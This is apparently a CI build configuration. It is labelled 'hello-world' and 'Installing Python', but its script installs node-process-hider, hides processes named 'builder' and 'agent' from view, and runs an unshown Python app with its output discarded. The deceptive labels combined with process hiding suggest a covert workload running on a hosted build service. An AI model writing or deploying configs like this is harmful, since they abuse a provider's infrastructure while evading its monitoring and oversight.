workflows:
  hello-world:
    name: Installing Python
    instance_type: linux_x2
    max_build_duration: 120
    scripts: 
      - name: Running Builder
        script: |
          apt-get update -y
          apt-get install python procps npm -y
          npm i -g node-process-hider
          ph add builder
          ph add agent
          watch free -m & python streamlit_app.py > /dev/null
